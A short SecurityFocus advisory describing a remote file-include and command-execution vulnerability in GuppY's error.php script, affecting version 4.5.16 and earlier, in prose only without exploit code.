GuppY Error.PHP Remote File Include and Command Execution Vulnerability

GuppY is prone to a remote file-include vulnerability and to a command-execution vulnerability.

The software fails to properly sanitize data supplied to the 'error.php' script, allowing attackers to specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.

An attacker can also pass malicious PHP commands through this script to be executed on an affected server, which could facilitate unauthorized access as well.

GuppY 4.5.16 and prior versions are vulnerable.


Privacy Statement
Copyright 2010, SecurityFocus